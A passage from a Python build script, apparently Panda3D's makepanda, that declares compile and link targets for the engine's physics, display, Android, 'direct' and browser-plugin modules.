OPTS=['DIR:panda/src/particlesystem', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/particlesystem', ["*.h", "*_composite*.cxx"])
IGATEFILES.remove('orientedParticle.h')
IGATEFILES.remove('orientedParticleFactory.h')
IGATEFILES.remove('particlefactories.h')
IGATEFILES.remove('emitters.h')
IGATEFILES.remove('particles.h')
TargetAdd('libp3particlesystem.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3particlesystem.in', opts=['IMOD:panda3d.physics', 'ILIB:libp3particlesystem', 'SRCDIR:panda/src/particlesystem'])
TargetAdd('libp3particlesystem_igate.obj', input='libp3particlesystem.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/metalibs/pandaphysics/
#
if (PkgSkip("PANDAPHYSICS")==0) and (not RUNTIME):
OPTS=['DIR:panda/metalibs/pandaphysics', 'BUILDING:PANDAPHYSICS']
TargetAdd('pandaphysics_pandaphysics.obj', opts=OPTS, input='pandaphysics.cxx')
TargetAdd('libpandaphysics.dll', input='pandaphysics_pandaphysics.obj')
TargetAdd('libpandaphysics.dll', input='p3physics_composite1.obj')
TargetAdd('libpandaphysics.dll', input='p3physics_composite2.obj')
TargetAdd('libpandaphysics.dll', input='p3particlesystem_composite1.obj')
TargetAdd('libpandaphysics.dll', input='p3particlesystem_composite2.obj')
TargetAdd('libpandaphysics.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandaphysics.dll', opts=['ADVAPI'])
OPTS=['DIR:panda/metalibs/pandaphysics', 'PYTHON']
TargetAdd('physics_module.obj', input='libp3physics.in')
if (PkgSkip("PANDAPARTICLESYSTEM")==0):
TargetAdd('physics_module.obj', input='libp3particlesystem.in')
TargetAdd('physics_module.obj', opts=OPTS)
TargetAdd('physics_module.obj', opts=['IMOD:panda3d.physics', 'ILIB:physics', 'IMPORT:panda3d.core'])
TargetAdd('physics.pyd', input='physics_module.obj')
TargetAdd('physics.pyd', input='libp3physics_igate.obj')
if (PkgSkip("PANDAPARTICLESYSTEM")==0):
TargetAdd('physics.pyd', input='libp3particlesystem_igate.obj')
TargetAdd('physics.pyd', input='libpandaphysics.dll')
TargetAdd('physics.pyd', input='libp3interrogatedb.dll')
TargetAdd('physics.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('physics.pyd', opts=['PYTHON'])
#
# DIRECTORY: panda/src/speedtree/
#
if (PkgSkip("SPEEDTREE")==0):
OPTS=['DIR:panda/src/speedtree', 'BUILDING:PANDASPEEDTREE', 'SPEEDTREE', 'PYTHON']
TargetAdd('pandaspeedtree_composite1.obj', opts=OPTS, input='pandaspeedtree_composite1.cxx')
IGATEFILES=GetDirectoryContents('panda/src/speedtree', ["*.h", "*_composite*.cxx"])
TargetAdd('libpandaspeedtree.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libpandaspeedtree.in', opts=['IMOD:libpandaspeedtree', 'ILIB:libpandaspeedtree', 'SRCDIR:panda/src/speedtree'])
TargetAdd('libpandaspeedtree_igate.obj', input='libpandaspeedtree.in', opts=["DEPENDENCYONLY"])
TargetAdd('libpandaspeedtree_module.obj', input='libpandaspeedtree.in')
TargetAdd('libpandaspeedtree_module.obj', opts=OPTS)
TargetAdd('libpandaspeedtree_module.obj', opts=['IMOD:libpandaspeedtree', 'ILIB:libpandaspeedtree'])
TargetAdd('libpandaspeedtree.dll', input='pandaspeedtree_composite1.obj')
TargetAdd('libpandaspeedtree.dll', input='libpandaspeedtree_igate.obj')
TargetAdd('libpandaspeedtree.dll', input='libpandaspeedtree_module.obj')
TargetAdd('libpandaspeedtree.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandaspeedtree.dll', opts=['SPEEDTREE'])
if SDK["SPEEDTREEAPI"] == 'OpenGL':
TargetAdd('libpandaspeedtree.dll', opts=['GL', 'NVIDIACG', 'CGGL'])
elif SDK["SPEEDTREEAPI"] == 'DirectX9':
TargetAdd('libpandaspeedtree.dll', opts=['DX9', 'NVIDIACG', 'CGDX9'])
#
# DIRECTORY: panda/src/testbed/
#
if (not RTDIST and not RUNTIME and PkgSkip("PVIEW")==0):
OPTS=['DIR:panda/src/testbed']
TargetAdd('pview_pview.obj', opts=OPTS, input='pview.cxx')
TargetAdd('pview.exe', input='pview_pview.obj')
TargetAdd('pview.exe', input='libp3framework.dll')
if not PkgSkip("EGG"):
TargetAdd('pview.exe', input='libpandaegg.dll')
TargetAdd('pview.exe', input=COMMON_PANDA_LIBS)
TargetAdd('pview.exe', opts=['ADVAPI', 'WINSOCK2', 'WINSHELL'])
#
# DIRECTORY: panda/src/android/
#
if (not RUNTIME and GetTarget() == 'android'):
OPTS=['DIR:panda/src/android']
TargetAdd('org/panda3d/android/NativeIStream.class', opts=OPTS, input='NativeIStream.java')
TargetAdd('org/panda3d/android/NativeOStream.class', opts=OPTS, input='NativeOStream.java')
TargetAdd('org/panda3d/android/PandaActivity.class', opts=OPTS, input='PandaActivity.java')
TargetAdd('org/panda3d/android/PythonActivity.class', opts=OPTS, input='PythonActivity.java')
TargetAdd('p3android_composite1.obj', opts=OPTS, input='p3android_composite1.cxx')
TargetAdd('libp3android.dll', input='p3android_composite1.obj')
TargetAdd('libp3android.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3android.dll', opts=['JNIGRAPHICS'])
TargetAdd('android_native_app_glue.obj', opts=OPTS + ['NOHIDDEN'], input='android_native_app_glue.c')
TargetAdd('android_main.obj', opts=OPTS, input='android_main.cxx')
if (not RTDIST and PkgSkip("PVIEW")==0):
TargetAdd('libpview_pview.obj', opts=OPTS, input='pview.cxx')
TargetAdd('libpview.dll', input='android_native_app_glue.obj')
TargetAdd('libpview.dll', input='android_main.obj')
TargetAdd('libpview.dll', input='libpview_pview.obj')
TargetAdd('libpview.dll', input='libp3framework.dll')
if not PkgSkip("EGG"):
TargetAdd('libpview.dll', input='libpandaegg.dll')
TargetAdd('libpview.dll', input='libp3android.dll')
TargetAdd('libpview.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpview.dll', opts=['MODULE', 'ANDROID'])
if (not RTDIST and PkgSkip("PYTHON")==0):
OPTS += ['PYTHON']
TargetAdd('ppython_ppython.obj', opts=OPTS, input='python_main.cxx')
TargetAdd('libppython.dll', input='android_native_app_glue.obj')
TargetAdd('libppython.dll', input='android_main.obj')
TargetAdd('libppython.dll', input='ppython_ppython.obj')
TargetAdd('libppython.dll', input='libp3framework.dll')
TargetAdd('libppython.dll', input='libp3android.dll')
TargetAdd('libppython.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libppython.dll', opts=['MODULE', 'ANDROID', 'PYTHON'])
#
# DIRECTORY: panda/src/androiddisplay/
#
if (GetTarget() == 'android' and PkgSkip("EGL")==0 and PkgSkip("GLES")==0 and not RUNTIME):
DefSymbol('GLES', 'OPENGLES_1', '')
OPTS=['DIR:panda/src/androiddisplay', 'DIR:panda/src/glstuff', 'BUILDING:PANDAGLES', 'GLES', 'EGL']
TargetAdd('pandagles_androiddisplay_composite1.obj', opts=OPTS, input='p3androiddisplay_composite1.cxx')
OPTS=['DIR:panda/metalibs/pandagles', 'BUILDING:PANDAGLES', 'GLES', 'EGL']
TargetAdd('pandagles_pandagles.obj', opts=OPTS, input='pandagles.cxx')
TargetAdd('libpandagles.dll', input='pandagles_pandagles.obj')
TargetAdd('libpandagles.dll', input='p3glesgsg_config_glesgsg.obj')
TargetAdd('libpandagles.dll', input='p3glesgsg_glesgsg.obj')
TargetAdd('libpandagles.dll', input='pandagles_androiddisplay_composite1.obj')
TargetAdd('libpandagles.dll', input='libp3android.dll')
TargetAdd('libpandagles.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandagles.dll', opts=['MODULE', 'GLES', 'EGL'])
#
# DIRECTORY: panda/src/tinydisplay/
#
if (not RUNTIME and (GetTarget() in ('windows', 'darwin') or PkgSkip("X11")==0) and PkgSkip("TINYDISPLAY")==0):
OPTS=['DIR:panda/src/tinydisplay', 'BUILDING:TINYDISPLAY']
TargetAdd('p3tinydisplay_composite1.obj', opts=OPTS, input='p3tinydisplay_composite1.cxx')
TargetAdd('p3tinydisplay_composite2.obj', opts=OPTS, input='p3tinydisplay_composite2.cxx')
TargetAdd('p3tinydisplay_ztriangle_1.obj', opts=OPTS, input='ztriangle_1.cxx')
TargetAdd('p3tinydisplay_ztriangle_2.obj', opts=OPTS, input='ztriangle_2.cxx')
TargetAdd('p3tinydisplay_ztriangle_3.obj', opts=OPTS, input='ztriangle_3.cxx')
TargetAdd('p3tinydisplay_ztriangle_4.obj', opts=OPTS, input='ztriangle_4.cxx')
TargetAdd('p3tinydisplay_ztriangle_table.obj', opts=OPTS, input='ztriangle_table.cxx')
if GetTarget() == 'darwin':
TargetAdd('p3tinydisplay_tinyOsxGraphicsWindow.obj', opts=OPTS, input='tinyOsxGraphicsWindow.mm')
TargetAdd('libp3tinydisplay.dll', input='p3tinydisplay_tinyOsxGraphicsWindow.obj')
TargetAdd('libp3tinydisplay.dll', opts=['CARBON', 'AGL', 'COCOA'])
elif GetTarget() == 'windows':
TargetAdd('libp3tinydisplay.dll', input='libp3windisplay.dll')
TargetAdd('libp3tinydisplay.dll', opts=['WINIMM', 'WINGDI', 'WINKERNEL', 'WINOLDNAMES', 'WINUSER', 'WINMM'])
else:
TargetAdd('libp3tinydisplay.dll', input='p3x11display_composite1.obj')
TargetAdd('libp3tinydisplay.dll', opts=['X11'])
TargetAdd('libp3tinydisplay.dll', input='p3tinydisplay_composite1.obj')
TargetAdd('libp3tinydisplay.dll', input='p3tinydisplay_composite2.obj')
TargetAdd('libp3tinydisplay.dll', input='p3tinydisplay_ztriangle_1.obj')
TargetAdd('libp3tinydisplay.dll', input='p3tinydisplay_ztriangle_2.obj')
TargetAdd('libp3tinydisplay.dll', input='p3tinydisplay_ztriangle_3.obj')
TargetAdd('libp3tinydisplay.dll', input='p3tinydisplay_ztriangle_4.obj')
TargetAdd('libp3tinydisplay.dll', input='p3tinydisplay_ztriangle_table.obj')
TargetAdd('libp3tinydisplay.dll', input=COMMON_PANDA_LIBS)
#
# DIRECTORY: direct/src/directbase/
#
if (PkgSkip("DIRECT")==0):
OPTS=['DIR:direct/src/directbase', 'PYTHON']
TargetAdd('p3directbase_directbase.obj', opts=OPTS+['BUILDING:DIRECT'], input='directbase.cxx')
#
# DIRECTORY: direct/src/dcparser/
#
if (PkgSkip("DIRECT")==0):
OPTS=['DIR:direct/src/dcparser', 'WITHINPANDA', 'BISONPREFIX_dcyy', 'PYTHON']
CreateFile(GetOutputDir()+"/include/dcParser.h")
TargetAdd('p3dcparser_dcParser.obj', opts=OPTS, input='dcParser.yxx')
TargetAdd('dcParser.h', input='p3dcparser_dcParser.obj', opts=['DEPENDENCYONLY'])
TargetAdd('p3dcparser_dcLexer.obj', opts=OPTS, input='dcLexer.lxx')
TargetAdd('p3dcparser_composite1.obj', opts=OPTS, input='p3dcparser_composite1.cxx')
TargetAdd('p3dcparser_composite2.obj', opts=OPTS, input='p3dcparser_composite2.cxx')
OPTS=['DIR:direct/src/dcparser', 'WITHINPANDA', 'PYTHON']
IGATEFILES=GetDirectoryContents('direct/src/dcparser', ["*.h", "*_composite*.cxx"])
if "dcParser.h" in IGATEFILES: IGATEFILES.remove("dcParser.h")
if "dcmsgtypes.h" in IGATEFILES: IGATEFILES.remove('dcmsgtypes.h')
TargetAdd('libp3dcparser.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3dcparser.in', opts=['IMOD:panda3d.direct', 'ILIB:libp3dcparser', 'SRCDIR:direct/src/dcparser'])
TargetAdd('libp3dcparser_igate.obj', input='libp3dcparser.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: direct/src/deadrec/
#
if (PkgSkip("DIRECT")==0):
OPTS=['DIR:direct/src/deadrec', 'BUILDING:DIRECT']
TargetAdd('p3deadrec_composite1.obj', opts=OPTS, input='p3deadrec_composite1.cxx')
OPTS=['DIR:direct/src/deadrec', 'PYTHON']
IGATEFILES=GetDirectoryContents('direct/src/deadrec', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3deadrec.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3deadrec.in', opts=['IMOD:panda3d.direct', 'ILIB:libp3deadrec', 'SRCDIR:direct/src/deadrec'])
TargetAdd('libp3deadrec_igate.obj', input='libp3deadrec.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: direct/src/distributed/
#
if (PkgSkip("DIRECT")==0):
OPTS=['DIR:direct/src/distributed', 'DIR:direct/src/dcparser', 'WITHINPANDA', 'BUILDING:DIRECT', 'OPENSSL', 'PYTHON']
TargetAdd('p3distributed_config_distributed.obj', opts=OPTS, input='config_distributed.cxx')
TargetAdd('p3distributed_cConnectionRepository.obj', opts=OPTS, input='cConnectionRepository.cxx')
TargetAdd('p3distributed_cDistributedSmoothNodeBase.obj', opts=OPTS, input='cDistributedSmoothNodeBase.cxx')
OPTS=['DIR:direct/src/distributed', 'WITHINPANDA', 'OPENSSL', 'PYTHON']
IGATEFILES=GetDirectoryContents('direct/src/distributed', ["*.h", "*.cxx"])
TargetAdd('libp3distributed.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3distributed.in', opts=['IMOD:panda3d.direct', 'ILIB:libp3distributed', 'SRCDIR:direct/src/distributed'])
TargetAdd('libp3distributed_igate.obj', input='libp3distributed.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: direct/src/interval/
#
if (PkgSkip("DIRECT")==0):
OPTS=['DIR:direct/src/interval', 'BUILDING:DIRECT']
TargetAdd('p3interval_composite1.obj', opts=OPTS, input='p3interval_composite1.cxx')
OPTS=['DIR:direct/src/interval', 'PYTHON']
IGATEFILES=GetDirectoryContents('direct/src/interval', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3interval.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3interval.in', opts=['IMOD:panda3d.direct', 'ILIB:libp3interval', 'SRCDIR:direct/src/interval'])
TargetAdd('libp3interval_igate.obj', input='libp3interval.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: direct/src/showbase/
#
if (PkgSkip("DIRECT")==0):
OPTS=['DIR:direct/src/showbase', 'BUILDING:DIRECT']
TargetAdd('p3showbase_showBase.obj', opts=OPTS, input='showBase.cxx')
if GetTarget() == 'darwin':
TargetAdd('p3showbase_showBase_assist.obj', opts=OPTS, input='showBase_assist.mm')
OPTS=['DIR:direct/src/showbase', 'PYTHON']
IGATEFILES=GetDirectoryContents('direct/src/showbase', ["*.h", "showBase.cxx"])
TargetAdd('libp3showbase.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3showbase.in', opts=['IMOD:panda3d.direct', 'ILIB:libp3showbase', 'SRCDIR:direct/src/showbase'])
TargetAdd('libp3showbase_igate.obj', input='libp3showbase.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: direct/src/motiontrail/
#
if (PkgSkip("DIRECT")==0):
OPTS=['DIR:direct/src/motiontrail', 'BUILDING:DIRECT']
TargetAdd('p3motiontrail_cMotionTrail.obj', opts=OPTS, input='cMotionTrail.cxx')
TargetAdd('p3motiontrail_config_motiontrail.obj', opts=OPTS, input='config_motiontrail.cxx')
OPTS=['DIR:direct/src/motiontrail', 'PYTHON']
IGATEFILES=GetDirectoryContents('direct/src/motiontrail', ["*.h", "cMotionTrail.cxx"])
TargetAdd('libp3motiontrail.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3motiontrail.in', opts=['IMOD:panda3d.direct', 'ILIB:libp3motiontrail', 'SRCDIR:direct/src/motiontrail'])
TargetAdd('libp3motiontrail_igate.obj', input='libp3motiontrail.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: direct/metalibs/direct/
#
if (PkgSkip("DIRECT")==0):
TargetAdd('libp3direct.dll', input='p3directbase_directbase.obj')
TargetAdd('libp3direct.dll', input='p3showbase_showBase.obj')
if GetTarget() == 'darwin':
TargetAdd('libp3direct.dll', input='p3showbase_showBase_assist.obj')
TargetAdd('libp3direct.dll', input='p3deadrec_composite1.obj')
TargetAdd('libp3direct.dll', input='p3interval_composite1.obj')
TargetAdd('libp3direct.dll', input='p3motiontrail_config_motiontrail.obj')
TargetAdd('libp3direct.dll', input='p3motiontrail_cMotionTrail.obj')
TargetAdd('libp3direct.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3direct.dll', opts=['ADVAPI', 'OPENSSL', 'WINUSER', 'WINGDI'])
OPTS=['PYTHON']
TargetAdd('direct_module.obj', input='libp3dcparser.in')
TargetAdd('direct_module.obj', input='libp3showbase.in')
TargetAdd('direct_module.obj', input='libp3deadrec.in')
TargetAdd('direct_module.obj', input='libp3interval.in')
TargetAdd('direct_module.obj', input='libp3distributed.in')
TargetAdd('direct_module.obj', input='libp3motiontrail.in')
TargetAdd('direct_module.obj', opts=OPTS)
TargetAdd('direct_module.obj', opts=['IMOD:panda3d.direct', 'ILIB:direct', 'IMPORT:panda3d.core'])
TargetAdd('direct.pyd', input='libp3dcparser_igate.obj')
TargetAdd('direct.pyd', input='libp3showbase_igate.obj')
TargetAdd('direct.pyd', input='libp3deadrec_igate.obj')
TargetAdd('direct.pyd', input='libp3interval_igate.obj')
TargetAdd('direct.pyd', input='libp3distributed_igate.obj')
TargetAdd('direct.pyd', input='libp3motiontrail_igate.obj')
# These are part of direct.pyd, not libp3direct.dll, because they rely on
# the Python libraries. If a C++ user needs these modules, we can move them
# back and filter out the Python-specific code.
TargetAdd('direct.pyd', input='p3dcparser_composite1.obj')
TargetAdd('direct.pyd', input='p3dcparser_composite2.obj')
TargetAdd('direct.pyd', input='p3dcparser_dcParser.obj')
TargetAdd('direct.pyd', input='p3dcparser_dcLexer.obj')
TargetAdd('direct.pyd', input='p3distributed_config_distributed.obj')
TargetAdd('direct.pyd', input='p3distributed_cConnectionRepository.obj')
TargetAdd('direct.pyd', input='p3distributed_cDistributedSmoothNodeBase.obj')
TargetAdd('direct.pyd', input='direct_module.obj')
TargetAdd('direct.pyd', input='libp3direct.dll')
TargetAdd('direct.pyd', input='libp3interrogatedb.dll')
TargetAdd('direct.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('direct.pyd', opts=['PYTHON', 'OPENSSL', 'WINUSER', 'WINGDI', 'WINSOCK2'])
#
# DIRECTORY: direct/src/dcparse/
#
if (PkgSkip("PYTHON")==0 and PkgSkip("DIRECT")==0 and not RTDIST and not RUNTIME):
OPTS=['DIR:direct/src/dcparse', 'DIR:direct/src/dcparser', 'WITHINPANDA', 'ADVAPI', 'PYTHON']
TargetAdd('dcparse_dcparse.obj', opts=OPTS, input='dcparse.cxx')
TargetAdd('p3dcparse.exe', input='p3dcparser_composite1.obj')
TargetAdd('p3dcparse.exe', input='p3dcparser_composite2.obj')
TargetAdd('p3dcparse.exe', input='p3dcparser_dcParser.obj')
TargetAdd('p3dcparse.exe', input='p3dcparser_dcLexer.obj')
TargetAdd('p3dcparse.exe', input='dcparse_dcparse.obj')
TargetAdd('p3dcparse.exe', input='libp3direct.dll')
TargetAdd('p3dcparse.exe', input=COMMON_PANDA_LIBS)
TargetAdd('p3dcparse.exe', input='libp3pystub.lib')
TargetAdd('p3dcparse.exe', opts=['ADVAPI', 'PYTHON'])
#
# DIRECTORY: direct/src/plugin/
#
if (RTDIST or RUNTIME):
# Explicitly define this as we don't include dtool_config.h here.
if GetTarget() not in ('windows', 'darwin'):
DefSymbol("RUNTIME", "HAVE_X11", "1")
OPTS=['DIR:direct/src/plugin', 'BUILDING:P3D_PLUGIN', 'RUNTIME', 'OPENSSL']
TargetAdd('plugin_common.obj', opts=OPTS, input='plugin_common_composite1.cxx')
OPTS += ['ZLIB', 'MSIMG']
TargetAdd('plugin_plugin.obj', opts=OPTS, input='p3d_plugin_composite1.cxx')
TargetAdd('plugin_mkdir_complete.obj', opts=OPTS, input='mkdir_complete.cxx')
TargetAdd('plugin_wstring_encode.obj', opts=OPTS, input='wstring_encode.cxx')
TargetAdd('plugin_parse_color.obj', opts=OPTS, input='parse_color.cxx')
TargetAdd('plugin_get_twirl_data.obj', opts=OPTS, input='get_twirl_data.cxx')
TargetAdd('plugin_find_root_dir.obj', opts=OPTS, input='find_root_dir.cxx')
if GetTarget() == 'darwin':
TargetAdd('plugin_find_root_dir_assist.obj', opts=OPTS, input='find_root_dir_assist.mm')
TargetAdd('plugin_binaryXml.obj', opts=OPTS, input='binaryXml.cxx')
TargetAdd('plugin_fileSpec.obj', opts=OPTS, input='fileSpec.cxx')
TargetAdd('plugin_handleStream.obj', opts=OPTS, input='handleStream.cxx')
TargetAdd('plugin_handleStreamBuf.obj', opts=OPTS, input='handleStreamBuf.cxx')
if (RTDIST):
for fname in ("p3d_plugin.dll", "libp3d_plugin_static.ilb"):
TargetAdd(fname, input='plugin_plugin.obj')
TargetAdd(fname, input='plugin_mkdir_complete.obj')
TargetAdd(fname, input='plugin_wstring_encode.obj')
TargetAdd(fname, input='plugin_parse_color.obj')
TargetAdd(fname, input='plugin_find_root_dir.obj')
if GetTarget() == 'darwin':
TargetAdd(fname, input='plugin_find_root_dir_assist.obj')
TargetAdd(fname, input='plugin_fileSpec.obj')
TargetAdd(fname, input='plugin_binaryXml.obj')
TargetAdd(fname, input='plugin_handleStream.obj')
TargetAdd(fname, input='plugin_handleStreamBuf.obj')
TargetAdd(fname, input='libp3tinyxml.ilb')
if GetTarget() == 'darwin':
TargetAdd(fname, input='libp3subprocbuffer.ilb')
TargetAdd(fname, opts=['OPENSSL', 'ZLIB', 'X11', 'ADVAPI', 'WINUSER', 'WINGDI', 'WINSHELL', 'WINCOMCTL', 'WINOLE', 'MSIMG'])
TargetAdd("libp3d_plugin_static.ilb", input='plugin_get_twirl_data.obj')
if (PkgSkip("PYTHON")==0 and RTDIST):
# Freeze VFSImporter and its dependency modules into p3dpython.
# Mark panda3d.core as a dependency to make sure to build that first.
TargetAdd('p3dpython_frozen.obj', input='VFSImporter.py', opts=['DIR:direct/src/showbase', 'FREEZE_STARTUP', 'PYTHON'])
TargetAdd('p3dpython_frozen.obj', dep='core.pyd')
OPTS += ['PYTHON']
TargetAdd('p3dpython_p3dpython_composite1.obj', opts=OPTS, input='p3dpython_composite1.cxx')
TargetAdd('p3dpython_p3dPythonMain.obj', opts=OPTS, input='p3dPythonMain.cxx')
TargetAdd('p3dpython.exe', input='p3dpython_p3dpython_composite1.obj')
TargetAdd('p3dpython.exe', input='p3dpython_p3dPythonMain.obj')
TargetAdd('p3dpython.exe', input='p3dpython_frozen.obj')
TargetAdd('p3dpython.exe', input=COMMON_PANDA_LIBS)
TargetAdd('p3dpython.exe', input='libp3tinyxml.ilb')
TargetAdd('p3dpython.exe', input='libp3interrogatedb.dll')
TargetAdd('p3dpython.exe', opts=['PYTHON', 'WINUSER'])
TargetAdd('libp3dpython.dll', input='p3dpython_p3dpython_composite1.obj')
TargetAdd('libp3dpython.dll', input='p3dpython_frozen.obj')
TargetAdd('libp3dpython.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3dpython.dll', input='libp3tinyxml.ilb')
TargetAdd('libp3dpython.dll', input='libp3interrogatedb.dll')
TargetAdd('libp3dpython.dll', opts=['PYTHON', 'WINUSER'])
if GetTarget() == 'windows':
DefSymbol("NON_CONSOLE", "NON_CONSOLE", "")
OPTS.append("NON_CONSOLE")
TargetAdd('p3dpythonw_p3dpython_composite1.obj', opts=OPTS, input='p3dpython_composite1.cxx')
TargetAdd('p3dpythonw_p3dPythonMain.obj', opts=OPTS, input='p3dPythonMain.cxx')
TargetAdd('p3dpythonw.exe', input='p3dpythonw_p3dpython_composite1.obj')
TargetAdd('p3dpythonw.exe', input='p3dpythonw_p3dPythonMain.obj')
TargetAdd('p3dpythonw.exe', input='p3dpython_frozen.obj')
TargetAdd('p3dpythonw.exe', input=COMMON_PANDA_LIBS)
TargetAdd('p3dpythonw.exe', input='libp3tinyxml.ilb')
TargetAdd('p3dpythonw.exe', input='libp3interrogatedb.dll')
TargetAdd('p3dpythonw.exe', opts=['SUBSYSTEM:WINDOWS', 'PYTHON', 'WINUSER'])
if (PkgSkip("OPENSSL")==0 and RTDIST and False):
OPTS=['DIR:direct/src/plugin', 'DIR:panda/src/express', 'OPENSSL']
if GetTarget() == 'darwin':
OPTS += ['OPT:2']
if (PkgSkip("FLTK")==0):
OPTS.append("FLTK")
TargetAdd('plugin_p3dCert.obj', opts=OPTS, input='p3dCert.cxx')
TargetAdd('plugin_p3dCert_strings.obj', opts=OPTS, input='p3dCert_strings.cxx')
TargetAdd('p3dcert.exe', input='plugin_mkdir_complete.obj')
TargetAdd('p3dcert.exe', input='plugin_wstring_encode.obj')
TargetAdd('p3dcert.exe', input='plugin_p3dCert.obj')
TargetAdd('p3dcert.exe', input='plugin_p3dCert_strings.obj')
OPTS=['SUBSYSTEM:WINDOWS', 'OPENSSL', 'FLTK', 'X11', 'WINCOMCTL', 'WINSOCK', 'WINGDI', 'WINUSER', 'ADVAPI', 'WINOLE', 'WINSHELL', 'SUBSYSTEM:WINDOWS']
if GetTarget() == 'darwin':
OPTS += ['OPT:2']
TargetAdd('p3dcert.exe', opts=OPTS)
elif (PkgSkip("WX")==0):
OPTS += ["WX", "RTTI"]
TargetAdd('plugin_p3dCert.obj', opts=OPTS, input='p3dCert_wx.cxx')
TargetAdd('p3dcert.exe', input='plugin_mkdir_complete.obj')
TargetAdd('p3dcert.exe', input='plugin_wstring_encode.obj')
TargetAdd('p3dcert.exe', input='plugin_p3dCert.obj')
OPTS=['SUBSYSTEM:WINDOWS', 'OPENSSL', 'WX', 'CARBON', 'WINOLE', 'WINOLEAUT', 'WINUSER', 'ADVAPI', 'WINSHELL', 'WINCOMCTL', 'WINGDI', 'WINCOMDLG']
if GetTarget() == "darwin":
OPTS += ['GL', 'OPT:2']
TargetAdd('p3dcert.exe', opts=OPTS)
#
# DIRECTORY: direct/src/plugin_npapi/
#
if RUNTIME:
OPTS=['DIR:direct/src/plugin_npapi', 'RUNTIME', 'GTK2']
if GetTarget() == 'windows':
nppanda3d_rc = {"name" : "Panda3D Game Engine Plug-in",
"version" : VERSION,
"description" : "Runs 3-D games and interactive applets",
"filename" : "nppanda3d.dll",
"mimetype" : "application/x-panda3d",
"extension" : "p3d",
"filedesc" : "Panda3D applet"}
TargetAdd('nppanda3d.res', opts=OPTS, winrc=nppanda3d_rc)
elif GetTarget() == 'darwin':
TargetAdd('nppanda3d.rsrc', opts=OPTS, input='nppanda3d.r')
OPTS += ['GTK2']
TargetAdd('plugin_npapi_nppanda3d_composite1.obj', opts=OPTS, input='nppanda3d_composite1.cxx')
TargetAdd('nppanda3d.plugin', input='plugin_common.obj')
TargetAdd('nppanda3d.plugin', input='plugin_parse_color.obj')
TargetAdd('nppanda3d.plugin', input='plugin_get_twirl_data.obj')
TargetAdd('nppanda3d.plugin', input='plugin_wstring_encode.obj')
TargetAdd('nppanda3d.plugin', input='plugin_npapi_nppanda3d_composite1.obj')
if GetTarget() == 'windows':
TargetAdd('nppanda3d.plugin', input='nppanda3d.res')
TargetAdd('nppanda3d.plugin', input='nppanda3d.def', ipath=OPTS)
elif GetTarget() == 'darwin':
TargetAdd('nppanda3d.plugin', input='nppanda3d.rsrc')
TargetAdd('nppanda3d.plugin', input='nppanda3d.plist', ipath=OPTS)
TargetAdd('nppanda3d.plugin', input='plugin_find_root_dir_assist.obj')
TargetAdd('nppanda3d.plugin', input='libp3tinyxml.ilb')
TargetAdd('nppanda3d.plugin', opts=['OPENSSL', 'WINGDI', 'WINUSER', 'WINSHELL', 'WINOLE', 'CARBON'])
#
# DIRECTORY: direct/src/plugin_activex/
#
if (RUNTIME and GetTarget() == 'windows' and PkgSkip("MFC")==0):
OPTS=['DIR:direct/src/plugin_activex', 'RUNTIME', 'ACTIVEX', 'MFC']
DefSymbol('ACTIVEX', '_USRDLL', '')
DefSymbol('ACTIVEX', '_WINDLL', '')
DefSymbol('ACTIVEX', '_AFXDLL', '')
DefSymbol('ACTIVEX', '_MBCS', '')
TargetAdd('P3DActiveX.tlb', opts=OPTS, input='P3DActiveX.idl')
TargetAdd('P3DActiveX.res', opts=OPTS, input='P3DActiveX.rc')
TargetAdd('plugin_activex_p3dactivex_composite1.obj', opts=OPTS, input='p3dactivex_composite1.cxx')
TargetAdd('p3dactivex.ocx', input='plugin_common.obj')
TargetAdd('p3dactivex.ocx', input='plugin_parse_color.obj')
TargetAdd('p3dactivex.ocx', input='plugin_get_twirl_data.obj')
TargetAdd('p3dactivex.ocx', input='plugin_wstring_encode.obj')
TargetAdd('p3dactivex.ocx', input='plugin_activex_p3dactivex_composite1.obj')
TargetAdd('p3dactivex.ocx', input='P3DActiveX.res')
TargetAdd('p3dactivex.ocx', input='P3DActiveX.def', ipath=OPTS)
TargetAdd('p3dactivex.ocx', input='libp3tinyxml.ilb')
TargetAdd('p3dactivex.ocx', opts=['MFC', 'WINSOCK2', 'OPENSSL', 'WINGDI', 'WINUSER'])
#
# DIRECTORY: direct/src/plugin_standalone/
#
if (RUNTIME):
OPTS=['DIR:direct/src/plugin_standalone', 'RUNTIME', 'OPENSSL']
TargetAdd('plugin_standalone_panda3d.obj', opts=OPTS, input='panda3d.cxx')
TargetAdd('plugin_standalone_panda3dBase.obj', opts=OPTS, input='panda3dBase.cxx')
if GetTarget() == 'windows':
panda3d_rc = {"name" : "Panda3D Game Engine Plug-in",
"version" : VERSION,
"description" : "Runs 3-D games and interactive applets",
"filename" : "panda3d.exe",
"mimetype" : "application/x-panda3d",
"extension" : "p3d",
"filedesc" : "Panda3D applet",
"icon" : "panda3d.ico"}
TargetAdd('panda3d.res', opts=OPTS, winrc=panda3d_rc)
TargetAdd('plugin_standalone_panda3dMain.obj', opts=OPTS, input='panda3dMain.cxx')
